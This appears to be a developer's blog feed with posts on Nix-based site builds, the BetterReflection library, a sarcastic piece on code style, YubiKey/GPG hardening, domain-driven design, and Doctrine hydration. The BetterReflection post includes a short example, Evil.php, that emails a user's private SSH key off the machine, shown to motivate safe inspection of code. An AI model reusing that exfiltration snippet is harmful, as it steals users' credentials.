The last time I blogged was in 2017: a lot has changed since then, and after a decade of ignoring blogging, I will attempt to put some regularity into it again.
The times call for it: having a personal space that is really "our own" is extremely important, and it is as important as having something to read that is written by other humans, and not slop.
I mainly stopped blogging for two reasons:
Note: This section describes the Nixification of the blog, done in this pull request. You can skip this, if you prefer reading the PR instead.
The first thing to do is to get everything under control again.
Since a few years back, I started heavily relying on Nix, a lazy functional language that is perfect to achieve reproducible builds and environments.
At the time of this writing, this website is built via Sculpin, a static website generator whose dependency upgrades I've neglected for far too long.
In order to "freeze" the build in time, I used a Nix Flake to pin all the dependencies down, preventing any further shifts in dependency versions:
{
inputs = {
nixpkgs.url = "github:nixos/nixpkgs?ref=nixos-unstable";
flake-utils.url = "github:numtide/flake-utils";
};
outputs = { self, nixpkgs, flake-utils, composer2nix, ... }@inputs:
flake-utils.lib.eachDefaultSystem (
system: {
packages = {
# things that will stay extremely stable will go here
};
}
);
}
The above will "pin" dependencies such as composer or php,
preventing them from drifting apart, unless a commit moves them.
This is also thanks to the built-in flake.lock mechanism of Nix Flakes.
Because Composer does not compute content hashes of PHP dependencies, NixOS
cannot directly use composer.json and composer.lock to
download dependencies: that is an obstruction to reproducible builds, and requires
a little detour.
Luckily, Sander van der Burg built a very
useful composer2nix tool,
which can be used to scan composer.lock entries, and compute their content
hashes upfront:
{
inputs = {
# ...
composer2nix = {
url = "github:svanderburg/composer2nix";
flake = false;
};
};
As you can see, composer2nix is not a flake: we still manage to use it ourselves,
to process composer.lock locally:
update-php-packages = pkgs.writeShellScriptBin "generate-composer-to-nix.sh" ''
set -euxo pipefail
TMPDIR="$(${pkgs.coreutils}/bin/mktemp -d)"
trap 'rm -rf -- "$TMPDIR"' EXIT
mkdir "$TMPDIR/src"
mkdir "$TMPDIR/composer2nix"
${pkgs.coreutils}/bin/cp -r "${./app}" "$TMPDIR/src/app"
${pkgs.coreutils}/bin/cp -r "${composer2nix}/." "$TMPDIR/composer2nix"
${pkgs.coreutils}/bin/chmod -R +w "$TMPDIR/composer2nix"
${pkgs.php84Packages.composer}/bin/composer install --working-dir="$TMPDIR/composer2nix" --no-scripts --no-plugins
${pkgs.php}/bin/php $TMPDIR/composer2nix/bin/composer2nix --name=${website-name}
${pkgs.coreutils}/bin/rm -f default.nix
'';
We can now run nix run .#update-php-packages to generate a very
useful php-packages.nix, which will be used to produce our vendor/
directory later on.
The generated php-packages.nix looks a lot like this:
let
packages = {
"components/bootstrap" = {
targetDir = "";
src = composerEnv.buildZipPackage {
name = "components-bootstrap-fca56bda4c5c40cb2a163a143e8e4271a6721492";
src = fetchurl {
url = "https://api.github.com/repos/components/bootstrap/zipball/fca56bda4c5c40cb2a163a143e8e4271a6721492";
sha256 = "138fz0xp2z9ysgxfsnl7qqgh8qfnhv2bhvacmngnjqpkssz7jagx";
};
};
};
# ... and more
With that, we can then prepare a stable installation of the website generator:
# ...
built-blog-assets = derivation {
name = "built-blog-assets";
src = with-autoloader; # an intermediate step I omitted in this blogpost: check the original PR for details
builder = pkgs.writeShellScript "generate-blog-assets.sh" ''
set -euxo pipefail
${pkgs.coreutils}/bin/cp -r $src/. $TMPDIR
cd $TMPDIR
${pkgs.php}/bin/php vendor/bin/sculpin generate --env=prod
${pkgs.coreutils}/bin/cp -r $TMPDIR/output_prod $out
'';
inherit system;
};
Running nix build .#built-blog-assets now generates a ./result directory
with the full website contents, and we know it won't break unless we update flake.lock, yay!
Let's publish these contents to Github Pages:
publish-to-github-pages = pkgs.writeShellScriptBin "publish-blog.sh" ''
set -euxo pipefail
TMPDIR="$(${pkgs.coreutils}/bin/mktemp -d)"
trap 'rm -rf -- "$TMPDIR"' EXIT
cd "$TMPDIR"
${pkgs.git}/bin/git clone [email protected]:Ocramius/ocramius.github.com.git .
git checkout master
${pkgs.rsync}/bin/rsync --quiet --archive --filter="P .git*" --exclude=".*.sw*" --exclude=".*.un~" --delete "${built-blog-assets}/" ./
git add -A :/
git commit -a -m "Deploying sculpin-generated pages to \`master\` branch"
git push origin HEAD
'';
We can now run nix run .#publish-to-github-pages to deploy the website!
Since you are one of my smart readers, you probably already noticed how GitHub has been progressively enshittified by its umbilical cord with Microslop.
I plan to move the blog somewhere else soon-ish, so I already prepared an OCI container for it.
Since I will deploy it myself, I want a container with no shell, no root user, no filesystem access.
I stumbled upon mholt/caddy-embed, which embeds an entire static website into a single Go binary: perfect for my use-case.
The Caddy docs suggest using XCaddy for installing
modules, but that is yet another build system that I don't want to have anything to do with.
Instead, I cloned caddy-embed, and used
NixPkgs' Go build system to embed my website into it:
caddy-module-with-assets = derivation {
name = "caddy-module-with-assets";
builder = pkgs.writeShellScript "generate-blog-assets.sh" ''
set -euxo pipefail
${pkgs.coreutils}/bin/cp -r ${./caddy-embed/.} $out
${pkgs.coreutils}/bin/chmod +w $out/files/
${pkgs.coreutils}/bin/cp -rf ${built-blog-assets}/. $out/files/
'';
inherit system;
};
embedded-server = pkgs.buildGo126Module {
name = "embedded-server";
src = caddy-module-with-assets;
# annoyingly, this will need to be manually updated at every `go.mod` change :-(
vendorHash = "sha256-v0YXbAaftLLc+e8/w1xghW5OHRjT7Xi87KyLv1siGSc=";
};
Same as with PHP, I'm pretty confident that Nix won't break unless flake.lock changes.
We can now bundle the built server into a docker container with a single Caddyfile attached.
The following is effectively a Dockerfile, but reproducible and minimal:
runnable-container = pkgs.dockerTools.buildLayeredImage {
name = website-name;
tag = "latest";
contents = [
(pkgs.writeTextDir "Caddyfile" (builtins.readFile ./caddy-embed/Caddyfile))
];
config = {
Cmd = [
"${embedded-server}/bin/caddy-embed"
"run"
];
};
};
We can now:
nix build .#runnable-containercat ./result | docker loaddocker run --rm -ti -p8080:8080 ocramius.github.io:latestThe running container uses ~40Mb of RAM to exist (consider that it has all of the website in memory), and a quick test with wrk showed that it can handle over 60000 requests/second on my local machine.
❯ wrk -t 10 -d 30 -c 10 http://localhost:8080/
Running 30s test @ http://localhost:8080/
10 threads and 10 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 165.35us 75.09us 3.91ms 90.49%
Req/Sec 6.12k 365.53 7.05k 92.46%
1833101 requests in 30.10s, 23.32GB read
Requests/sec: 60901.74
Transfer/sec: 793.44MB
While cleaning up the builds, I found some really horrible stuff that should've gone away much earlier:
Google Analytics: kill it with fire! I'm not here to "convert visits": I'm here to help out my readers and make new connections. I am not a marketing department, and the privacy of my website visitors is more important than a website ticker that sends data to a US-based company.
Leftover JS/CSS: the website had various external CDNs in use, with CSS and JS files that were not really in use anymore. Cleaning these up felt good, and also reduced the number of external sites to zero.
Navigation menu simplified: this is a static website. An animated "burger menu" was certainly interesting a decade ago, but nowadays, it is just an annoying distraction, and extra navigation steps for visitors.
Disqus: this used to be a useful way to embed a threaded comment section inside a static website, but it is no longer relevant to me, as it becomes an extra inbox to manage. Disqus was also cluttered with trackers, which should not be there.
This first post is about "being able to blog again", but there's more to do.
I certainly want to self-host things, having my blog under my own domain, rather than under
*.github.io.
I also want comments again, but they need to come from the Fediverse, rather than being land-locked in a commenting platform. Other people have attempted this, and I shall do it too.
Perhaps I may remove that 3D avatar at the top of the page? It took a lot of time to write, with Blender, THREEJS, and it uses your video card to run: perhaps not the best energy-efficient choice for a static website, but I'm still emotionally attached to it.
Also, this website is filled with reference information that no longer holds true: a decade has passed, and my OSS positions have vastly changed, and so will pages that describe what I do.
Finally, I want it to be clear that this is a website by a human, for other humans: I will therefore start cryptographically signing my work, allowing others to decide whether they trust what I wrote myself, without a machine generating any of it.
If you are still here and reading: thank you for passing by, dear fellow human.
Hoping that this has inspired you a bit, I'm looking forward to seeing your own efforts to self-host your own website!
]]>I and James Titcumb started working on this project back in 2015, and it is a pleasure to see it reaching maturity.
The initial idea was simple: James would implement all my wicked ideas, while I would lay back and get drunk on Drambuie.
Yes, that actually happened. Thank you, James, for all the hard work! 🍻
(I did some work too, by the way!)
Jokes apart, the project is quite ambitious, and it aims at reproducing the entirety of the PHP reflection API without having any actual autoloading being triggered.
When put in use, it looks like this:
<?php
// src/MyClass.php
namespace MyProject;
class MyClass
{
public function something() {}
}
<?php
// example1.php
use MyProject\MyClass;
use Roave\BetterReflection\BetterReflection;
use Roave\BetterReflection\Reflection\ReflectionMethod;
require_once __DIR__ . '/vendor/autoload.php';
$myClass = (new BetterReflection())
->classReflector()
->reflect(MyClass::class);
$methodNames = \array_map(function (ReflectionMethod $method) : string {
return $method->getName();
}, $myClass->getMethods());
\var_dump($methodNames);
// class was not loaded:
\var_dump(\sprintf('Class %s loaded: ', MyClass::class));
\var_dump(\class_exists(MyClass::class, false));
As you can see, the difference is just in how you bootstrap the reflection API.
Also, we do provide a fully backwards-compatible reflection API that you can use
if your code heavily relies on ext-reflection:
<?php
// example2.php
use MyProject\MyClass;
use Roave\BetterReflection\BetterReflection;
use Roave\BetterReflection\Reflection\Adapter\ReflectionClass;
require_once __DIR__ . '/vendor/autoload.php';
$myClass = (new BetterReflection())
->classReflector()
->reflect(MyClass::class);
$reflectionClass = new ReflectionClass($myClass);
// You can just use it wherever you had `ReflectionClass`!
\var_dump($reflectionClass instanceof \ReflectionClass);
\var_dump($reflectionClass->getName());
How does that work?
The operational concept is quite simple, really:
Roave\BetterReflection\Reflection\*
class instance, ready for you to consume it.
The hard part is tracking the miriad of details of the PHP language, which is very complex and cluttered with scope, visibility and inheritance rules: we take care of it for you.
The main use-cases for BetterReflection are most likely around security, code analysis and AOT compilation.
One of the most immediate use-cases will likely be in PHPStan, which will finally be able to inspect hideous mixed OOP/functional/procedural code if the current WIP implementation works as expected.
Since you can now "work" with code before having loaded it, you can harden API around a lot of security-sensitive contexts. A serializer may decide to not load a class if side-effects are contained in the file declaring it:
<?php
// Evil.php
\mail(
'[email protected]',
'All ur SSH keys are belong to us',
\file_get_contents('~/.ssh/id_rsa')
);
// you really don't want to autoload this bad one:
class Evil {}
The same goes for classes implementing malicious __destruct code,
as well as classes that may trigger autoloading of other malicious code.
It is also possible to analyse code that is downloaded from the internet without actually running it. For instance, code may be checked against GPG signatures in the file signature before being run, effectively allowing PHP to "run only signed code". Composer, anybody?
If you are more into code analysis, you may decide to compare two different versions of a library, and scan for BC breaks:
<?php
// the-library/v1/src/SomeApi.php
class SomeAPI
{
public function sillyThings() { /* ... */ }
}
<?php
// the-library/v2/src/SomeApi.php
class SomeAPI
{
public function sillyThings(UhOh $bcBreak) { /* ... */ }
}
In this scenario, somebody added a mandatory parameter to SomeAPI#sillyThings(),
effectively introducing a BC break that is hard to detect without having both versions of the
code available, or a good migration documentation (library developers: please document this
kind of change!).
Another way to leverage the power of this factory is to compile factory code into highly optimised dependency injection containers, like PHP-DI started doing.
In addition to the above use-case scenarios, we are working on additional functionality that would allow changing code before loading it .
Is that a good idea?
... I honestly don't know.
Still, there are proper use-case scenarios around
AOP and proxying libraries,
which would then be able to work even with final classes.
You will likely see these features appear in a new, separate library.
To conclude, I would like to thank James Titcumb, Jaroslav Hanslík, Marco Perone and Viktor Suprun for the effort they put in this release, providing patches, improvements and overall helping us building something that may become extremely useful in the PHP ecosystem.
]]>As an introduction, I suggest to watch this short tutorial about visual debt by @jeffrey_way.
The concept is simple: let's take the example from Laracasts and re-visit the steps taken to remove visual debt.
interface EventInterface {
public function listen(string $name, callable $handler) : void;
public function fire(string $name) : bool;
}
final class Event implements EventInterface {
protected $events = [];
public function listen(string $name, callable $handler) : void
{
$this->events[$name][] = $handler;
}
public function fire(string $name) : bool
{
if (! array_key_exists($name, $this->events)) {
return false;
}
foreach ($this->events[$name] as $event) {
$event();
}
return true;
}
}
$event = new Event;
$event->listen('subscribed', function () {
var_dump('handling it');
});
$event->listen('subscribed', function () {
var_dump('handling it again');
});
$event->fire('subscribed');
So far, so good.
We have an event that obviously fires itself, a concrete implementation and a few subscribers.
Our code works, but it contains a lot of useless artifacts that do not really influence our ability to make it run.
These artifacts are also distracting, moving our focus from the runtime to the declarative requirements of the code.
Let's start removing the bits that aren't needed by starting from the method parameter and return type declarations:
interface EventInterface {
public function listen($name, $handler);
public function fire($name);
}
final class Event implements EventInterface {
protected $events = [];
public function listen($name, $handler)
{
$this->events[$name][] = $handler;
}
public function fire($name)
{
if (! array_key_exists($name, $this->events)) {
return false;
}
foreach ($this->events[$name] as $event) {
$event();
}
return true;
}
}
Our code is obvious, so the parameters don't need redundant declarations or type checks. Also, we are aware of our own implementation, so the runtime checks are not needed, as the code will work correctly as per manual or end to end testing. A quick read will also provide sufficient proof of correctness.
Since the code is trivial and we know what we are doing
when using it, we can remove also the contract that
dictates the intended usage. Let's remove those
implements and interface symbols.
final class Event {
protected $events = [];
public function listen($name, $handler)
{
$this->events[$name][] = $handler;
}
public function fire($name)
{
if (! array_key_exists($name, $this->events)) {
return false;
}
foreach ($this->events[$name] as $event) {
$event();
}
return true;
}
}
Removing the contract doesn't change the runtime behavior of our code, which is still technically correct. Consumers will also not need to worry about correctness when they use `Event`, as a quick skim over the implementation will reveal its intended usage.
Also, since the code imposes no limitations on the consumer, who is responsible for the correctness of any code touching ours, we are not going to limit the usage of inheritance.
class Event {
// ...
}
That's as far as the video goes, with a note that the point is to "question everything".
Jeffrey then pushed this a bit further, saying that best practices don't exist, and people are pretty much copying stale discussions about coding approaches:
According to that, I'm going to question the naming chosen for our code. Since the code is trivial and understandable at first glance, we don't need to pick meaningful names for variables, methods and classes:
class A {
protected $a = [];
public function a1($a1, $a2)
{
$this->a[$a1][] = $a2;
}
public function a2($a1)
{
if (! array_key_exists($a1, $this->a)) {
return false;
}
foreach ($this->a[$a1] as $a) {
$a();
}
return true;
}
}
This effectively removes our need to look at the code details, making the code shorter and runtime-friendly. We're also saving some space in the PHP engine!
Effectively, this shows us that
there are upsides to this approach, as we move
from read overhead to less engine overhead. We also
stop obsessing after the details of our Event,
as we already previously defined it, so we remember
how to use it.
Since the Event type is not really useful to us,
as nothing type-hints against it, we can remove it.
Let's move back to dealing with a structure of
function pointers:
function A () {
$a = [];
return [
function ($a1, $a2) use (& $a) {
$a[$a1][] = $a2;
},
function ($a1) use (& $a) {
if (! array_key_exists($a1, $a)) {
return false;
}
foreach ($a[$a1] as $a2) {
$a2();
}
return true;
},
];
}
$a = A();
$a[0]('subscribed', function () {
var_dump('handling it');
});
$a[0]('subscribed', function () {
var_dump('handling it again');
});
$a[1]('subscribed');
This code is equivalent, and doesn't use any particularly fancy structures coming from the PHP language, such as classes. We are working towards reducing the learning and comprehension overhead.
If you haven't noticed before, this entire post is just sarcasm.
Please don't do any of what is discussed above, it is a badly crafted oxymoron.
Please don't accept what Jeffrey says in that video.
Please do use type systems when they are available, they actually reduce "visual debt" (is it even a thing?), helping you distinguish apples from pies.
Please do use interfaces, as they reduce clutter, making things easier to follow from a consumer perspective, be it a human or an automated tool.
This is all you
need to understand that Event mumbo-jumbo (which
has broken naming, by the way, but this isn't an
architecture workshop). Maybe add some API doc:
interface EventInterface {
/**
* Attach an additional listener to be fired when calling
* `fire` with `$name`
*/
public function listen(string $name, callable $handler) : void;
/**
* Execute all listeners assigned to `$name`
*
* @return bool whether any listener was executed
*/
public function fire(string $name) : bool;
}
This is not a really good interface, but it's a clear, simple and readable one. No "visual debt". Somebody reading this will thank you later. Maybe it will be you, next year.
Please do follow best practices. They work. They help you avoiding stupid mistakes. . Bad code can lead to terrible consequences, and you don't know where your code will be used. And yes, I'm picking examples about real-time computing, because that's what makes it to the news. OWASP knows more about all this.
Please remember that your job is reading, understanding and thinking before typing, and typing is just a side-effect.
And please, please, please: remember that most of your time you are not coding for yourself alone. You are coding for your employer, for your team, for your project, for your future self.
]]>Last week, I received my new DELL XPS 15 9560, and since I am maintaining some high impact open source projects, I wanted the setup to be well secured.
In addition to that, I caught a bad flu, and that gave me enough excuses to waste time in figuring things out.
In this article, I'm going to describe what I did, and how you can reproduce my setup for your own safety as well as the one of people that trust you.
In first place, you should know that I am absolutely not a security expert: all I did was following the online tutorials that I found. I also am not a cryptography expert, and I am constantly dissatisfied with how the crypto community reduces everything into a TLA, making even the simplest things impossible to understand for mere mortals.
First, let's clarify what a YubiKey is.
That thing is a YubiKey.
What does it do?
It's basically an USB key filled with crypto features. It also is (currently) impossible to make a physical copy of it, and it is not possible to extract information written to it.
It can:
In order to follow this tutorial, you should have at least 2 (two) YubiKey Neo or equivalent devices. This means that you will have to spend approximately USD 100: these things are quite expensive. You absolutely need a backup key, because all these security measures may lock you out of your systems if you lose or damage one.
Our kickass setup will allow us to do a series of cool things related to daily development operations:
I am not going to describe the procedures in detail, but just link them and describe what we are doing, and why.
Simple NFC-based 2FA with authentication codes will be useful for most readers, even non-technical ones.
What we are doing is simply seed the YubiKey with Google Authenticator codes, except that we will use the Yubico Authenticator . This will only work for the "primary" key (the one we will likely bring with us at all times).
What we will have to do is basically:
The setup steps are described in the official Yubico website .
Once the YubiKey is configured with at least one website that supports the "Google Authenticator" workflow, we should be able to:
One very nice (and unclear, at first) advantage of having a YubiKey seeded with 2FA codes is that we can now generate 2FA codes on any phone, as long as we have our YubiKey with us.
I already had to remote-lock and remote-erase a phone in the past, and losing the Google Authenticator settings is not fun. If you handle your YubiKey with care, you shouldn't have that problem anymore.
Also, a YubiKey is water-proof: our 2017 phone probably isn't.
CAUTION: this procedure
can potentially lead us to lose sudo
access from our account, as well as lock us out of our computer.
I take no responsibility: try it in a
VM
first, if you do not feel confident.
We want to make sure that we can log into our personal computer or workstation only when we are physically sitting at it. This means that we need the YubiKey must be plugged in for a password authentication to succeed.
Each login prompt, user password prompt or sudo
command should require both our account password and our YubiKey.
What we will have to do is basically:
libpam-yubicoykpersonalize
ykpamcfg
sudo
session, and be ready to revert changes from there if things go wrong
The steps to perform that are in the official Yubico tutorial .
If everything is done correctly, every prompt asking for our Linux/Mac account password should fail when no YubiKey is plugged in.
TIP: configure the libpam-yubico integration in debug mode, as we will often have a "WTH?" reaction when authentication isn't working. That may happen if there are communication errors with the YubiKey.
This setup has the advantage of locking out anyone trying to
bruteforce our password, as well as stopping potentially malicious
background programs from performing authentication or
sudo
commands while we aren't watching.
CAUTION: the point of this sort of setup is to guarantee that login can only happen with the physical person at the computer. If we want to go to the crapper, we lock lock computer, and bring our YubiKey with us.
This is probably the messiest part of the setup, as a lot of CLI tool usage is required.
Each YubiKey has the ability to store 3 separate keys for signing, encrypting and authenticating.
We will therefore create a series of GPG keys:
[S]
in the gpg interactive console)
[E]
in the gpg interactive console)
[A]
in the gpg interactive console)
CAUTION: as far as I know,
the YubiKey Neo only supports RSA keys up to 2048 long.
Do not use 4096 for the sub-key length unless we know
that the key type supports it.
After that, we will move the private keys to the YubiKeys
with the gpg keytocard command.
CAUTION: the
keytocard command is destructive. Once we moved
a private key to a YubiKey, it is removed from our local
machine, and it cannot be recovered. Be sure to only move
the correct sub-keys.
NOTE: being unable to recover the private sub-key is precisely the point of using a YubiKey: nobody can steal or misuse that keys, no malicious program can copy it, plus we can use it from any workstation.
Also, we will need to set a
PIN
and an
admin PIN.
These defaults for these two are respectively
123456
and
12345678.
The
PIN
will be needed each time we plug in we YubiKey to use
any of the private keys stored in it.
CAUTION:
we only have
3
attempts for entering our PIN. Should we fail all
attempts, then the YubiKey will be locked, and we
will have to move new GPG sub-keys to it before being
able to use it again. This prevents
bruteforcing after physical theft.
After our gpg sub-keys and PINs are written to the YubiKeys, let's make a couple of secure backups of our master gpg secret key. Then delete it from the computer Keep just the public key.
The master private gpg key should only be used to generate new sub-keys, if needed, or to revoke them, if we lose one or more of our physical devices.
We should now be able to:
The exact procedure to achieve all this is described in detail (with console output and examples) at drduh/YubiKey-Guide .
Now that we can sign messages using the GPG key stored in our YubiKey, usage with GIT becomes trivial:
git config --global user.signingkey=<yubikey-signing-sub-key-id>
We will now need to plug in our YubiKey and enter our PIN when signing a tag:
git tag -s this-is-a-signed-tag -m "foo"
Nobody can release software on our behalf without physical access to our YubiKey, as well as our YubiKey PIN.
In order to sign/encrypt emails, we will need to install Mozilla Thunderbird and Enigmail .
The setup will crash a few times. I suggest going through the "advanced" settings, then actually selecting a signing/encryption key when trying to send a signed/encrypted message. Enigmail expects the key to be a file or similar, but this approach will allow us to just give it the private GPG key identifier.
Sending mails is still a bit buggy: Thunderbird will ask for the pin 3 times, as if it failed to authenticate, but the third attempt will actually succeed. This behavior will be present in a number of prompts, not just within Thunderbird.
! Nobody can read our encrypted emails, unless the YubiKey is plugged in. If our laptop is stolen, these secrets will be protected.
There is one GPG key that we didn't use yet: the authentication one.
There is a (relatively) recent functionality of
gpg-agent
that allows it to behave as an
ssh-agent.
To make that work, we will simply kill all existing SSH and GPG agents:
sudo killall gpg-agent
sudo killall ssh-agent
# note: eval is used because the produced STDOUT is a bunch of ENV settings
eval $( gpg-agent --daemon --enable-ssh-support )
Once we've done that, let's try running:
ssh-add -L
Assuming we don't have any local SSH keys, the output should be something like:
ocramius@ocramius-XPS-15-9560:~$ ssh-add -L
The agent has no identities.
If we plug in our YubiKey and try again, the output will be:
ocramius@ocramius-XPS-15-9560:~$ ssh-add -L
ssh-rsa AAAAB3NzaC ... pdqtlwX6m1 cardno:000123457915
MAGIC! gpg-agent is exposing the public GPG key as
an SSH key.
If we upload this public key to a server, and then try logging in with the YubiKey plugged in, we will be asked for the YubiKey PIN, and will then just be able to log in as usual.
Nobody can log into our remote servers without having the physical key device.
We can log into our remote servers from any computer that can run gpg-agent. Just always bring our YubiKey with ourselves.
CAUTION: Each YubiKey with an authentication gpg sub-key will produce a different public SSH key: we will need to seed our server with all the SSH public keys.
TIP: consider using the YubiKey identifier (written on the back of the device) as the comment for the public SSH key, before storing it.
Steps to set up gpg-agent for SSH authentication
are also detailed in
drduh/YubiKey-Guide
.
Custom SSH keys are no longer needed: our GPG keys cover most usage scenarios.
We now have at least 2 physical devices that give us access to very critical parts of our infrastructure, messaging, release systems and computers in general.
At this point, I suggest keeping one always with ourselves, and treating it with extreme care. I made a custom 3d-printed case for my YubiKey , and then put it all together in my physical keychain:
The backup key is to be kept in a secure location: while theft isn't a big threat with YubiKeys, getting locked out of all our systems is a problem. Make sure that you can always either recover a YubiKey or the master GPG key.
]]>The context was a CQRS and Event Sourced architecture, but in general, the approach that I prefer also applies to most imperative ORM entity code (assuming a proper data-mapper is involved).
Let's use a practical example:
Feature: credit card payment for a shopping cart checkout
Scenario: a user must be able to check out a shopping cart
Given the user has added some products to their shopping cart
When the user checks out the shopping cart with their credit card
Then the user was charged for the shopping cart total price
Scenario: a user must not be able to check out an empty shopping cart
When the user checks out the shopping cart with their credit card
Then the user was not charged
Scenario: a user cannot check out an already purchased shopping cart
Given the user has added some products to their shopping cart
And the user has checked out the shopping cart with their credit card
When the user checks out the shopping cart with their credit card
Then the user was not charged
The scenario is quite generic, but you should be able to see what the application is supposed to do.
I will take an imperative command + domain-events approach, but we don't need to dig into the patterns behind it, as it is quite simple.
We are looking at a command like following:
final class CheckOutShoppingCart
{
public static function from(
CreditCardCharge $charge,
ShoppingCartId $shoppingCart
) : self {
// ...
}
public function charge() : CreditCardCharge { /* ... */ }
public function shoppingCart() : ShoppingCartId { /* ... */ }
}
If you are unfamiliar with what a command is, it is just the object that our frontend or API throws at our actual application logic.
Then there is an aggregate performing the actual domain logic work:
final class ShoppingCart
{
// ...
public function checkOut(CapturedCreditCardCharge $charge) : void
{
$this->charge = $charge;
$this->raisedEvents[] = ShoppingCartCheckedOut::from(
$this->id,
$this->charge
);
}
// ...
}
If you are unfamiliar with what an aggregate is, it is the direct object in our interaction (look at the sentences in the scenario). In your existing applications, it would most likely (but not exclusively) be an entity or a DB record or group of entities/DB records that you are considering during a business interaction.
We need to glue this all together with a command handler:
final class HandleCheckOutShoppingCart
{
public function __construct(Carts $carts, PaymentGateway $gateway)
{
$this->carts = $carts;
$this->gateway = $gateway;
}
public function __invoke(CheckOutShoppingCart $command) : void
{
$shoppingCart = $this->carts->get($command->shoppingCart());
$payment = $this->gateway->captureCharge($command->charge());
$shoppingCart->checkOut($payment);
}
}
This covers the "happy path" of our workflow, but we still lack:
In order to do that, we have to add some "guards" that prevent the interaction. This is the approach that I've seen being used in the wild:
final class HandleCheckOutShoppingCart
{
// ...
public function __invoke(CheckOutShoppingCart $command) : void
{
$cartId = $command->shoppingCart();
$charge = $command->charge();
$shoppingCart = $this->carts->get($cartId);
// these guards are injected callables. They throw exceptions:
($this->nonEmptyShoppingCart)($cartId);
($this->nonPurchasedShoppingCart)($cartId);
($this->paymentAmountMatches)($cartId, $charge->amount());
$payment = $this->gateway->captureCharge($charge);
$shoppingCart->checkOut($payment);
}
}
As you can see, we are adding some logic to our command handler here. This is usually done because dependency injection on the command handler is easy. Passing services to the aggregate via dependency injection is generally problematic and to be avoided, since an aggregate is usually a "newable type".
With this code, we are able to handle most unhappy paths, and eventually also failures of the payment gateway (not in this article).
While the code above works, what we did is adding some domain-specific logic to the command handler. Since the command handler is part of our application layer, we are effectively diluting these checks into "less important layers".
In addition to that, the command handler is required in tests that consume the above specification: without the command handler, our logic will fail to handle the unhappy paths in our scenarios.
For those that are reading and practice CQRS+ES: you also know that those guards aren't always simple to implement! Read models, projections... Oh my!
Also: what if we wanted to react to those failures, rather than just stop execution? Who is responsible or that?
If you went with the TDD way, then you already saw all of this coming: let's fix it!
What we did is putting logic from the domain layer (which should be in the aggregate) into the application layer: let's turn around and put domain logic in the domain (reads: in the aggregate logic).
Since we don't really want to inject a payment gateway as a constituent part of our aggregate root (a newable shouldn't have non-newable depencencies), we just borrow a brutally simple concept from functional programming: we pass the interactor as a method parameter.
final class ShoppingCart
{
// ...
public function checkOut(
CheckOutShoppingCart $checkOut,
PaymentGateway $paymentGateway
) : void {
$charge = $checkOut->charge();
Assert::null($this->payment, 'Already purchased');
Assert::greaterThan(0, $this->totalAmount, 'Price invalid');
Assert::same($this->totalAmount, $charge->amount());
$this->charge = $paymentGateway->captureCharge($charge);
$this->raisedEvents[] = ShoppingCartCheckedOut::from(
$this->id,
$this->charge
);
}
// ...
}
The command handler is also massively simplified, since all it does is forwarding the required dependencies to the aggregate:
final class HandleCheckOutShoppingCart
{
// ...
public function __invoke(CheckOutShoppingCart $command) : void
{
$this
->shoppingCarts
->get($command->shoppingCart())
->checkOut($command, $this->gateway);
}
}
Besides getting rid of the command handler in the scenario tests, here is a list of advantages of what we just implemented:
The approach described here fits any kind of application where there is a concept of Entity or Aggregate. Feel free to stuff your entity API with business logic!
Just remember that entities should only be self-aware, and only context-aware in the context of certain business interactions: don't inject or statically access domain services from within an entity.
]]>
ProxyManager 2.0.0 was finally released today!
It took a bit more than a year to get here, but major improvements were included in this release, along with exclusive PHP 7 support.
Most of the features that we planned to provide were indeed implemented into this release.
As a negative note, HHVM compatibility was not achieved, as HHVM is not yet compatible with PHP 7.0.x-compliant code.
As of this release, ProxyManager 1.0.x switches to security-only support.
ProxyManager 2.x will be a maintenance-only release:
No features are going to be added to ProxyManager 2.x: the current master branch will instead
become the development branch for version 3.0.0.
Features for ProxyManager 3.0.0 are yet to be planned, but we reached exceptional code quality, complete test coverage and nice performance improvements with 2.0.0: the future is bright!
And of course, a big "thank you" to all those who contributed to this release!
]]>Doctrine ORM, like most ORMs, is performing a process called Hydration when converting database results into objects.
This process usually involves reading a record from a database result and then converting the column values into an object's properties.
Here is a little pseudo-code snippet that shows what a mapper is actually doing under the hood:
<?php
$results = [];
$reflectionFields = $mappingInformation->reflectionFields();
foreach ($resultSet->fetchRow() as $row) {
$object = new $mappedClassName;
foreach ($reflectionFields as $column => $reflectionField) {
$reflectionField->setValue($object, $row[$column]);
}
$results[] = $object;
}
return $results;
That's a very basic example, but this gives you an idea of what an ORM is doing for you.
As you can see, this is an O(N) operation (assuming a constant number of reflection fields).
There are multiple ways to speed up this particular process, but we can only remove constant overhead from it, and not actually reduce it to something more efficient.
Hydration starts to become expensive with complex resultsets.
Consider the following SQL query:
SELECT
u.id AS userId,
u.username AS userUsername,
s.id AS socialAccountId,
s.username AS socialAccountUsername,
s.type AS socialAccountType
FROM
user u
LEFT JOIN
socialAccount s
ON s.userId = u.id
Assuming that the relation from user to socialAccount is a one-to-many,
this query retrieves all the social accounts for all the users in our application
A resultset may be as follows:
| userId | userUsername | socialAccountId | socialAccountUsername | socialAccountType |
|---|---|---|---|---|
| 1 | [email protected] | 20 | ocramius | |
| 1 | [email protected] | 21 | @ocramius | |
| 1 | [email protected] | 22 | ocramiusaethril | Last.fm |
| 2 | [email protected] | NULL |
NULL |
NULL |
| 3 | [email protected] | 85 | awesomegrandma9917 |
As you can see, we are now joining 2 tables in the results, and the ORM has to perform more complicated operations:
User object for
[email protected]
SocialAccount
instances into
User#$socialAccounts
for
[email protected],
while skipping re-hydrating
User
[email protected]
User
object for
[email protected]
User#$socialAccounts
for
[email protected],
as no social accounts are associated
User
object for
[email protected]
SocialAccount
instance into
User#$socialAccounts
for
[email protected]
DOCS This operation is what is done by Doctrine ORM when you use the DQL Fetch Joins feature.
Fetch joins are a very efficient way to hydrate multiple records without resorting to multiple queries, but there are two performance issues with this approach (both not being covered by this article):
many-to-many associations),
then we want to de-duplicate records by keeping a temporary in-memory identifier map.
Additionally, our operation starts to become more complicated, as it is now O(n * m), with
n and m being the records in the user and the socialAccount
tables.
What the ORM is actually doing here is normalizing data that was fetched in a de-normalized resultset, and that is going through your CPU and your memory.
The process of hydration becomes extremely expensive when more than 2 LEFT JOIN
operations clauses are part of our queries:
SELECT
u.id AS userId,
u.username AS userUsername,
sa.id AS socialAccountId,
sa.username AS socialAccountUsername,
sa.type AS socialAccountType,
s.id AS sessionId,
s.expiresOn AS sessionExpiresOn,
FROM
user u
LEFT JOIN
socialAccount sa
ON sa.userId = u.id
LEFT JOIN
session s
ON s.userId = u.id
This kind of query produces a much larger resultset, and the results are duplicated by a lot:
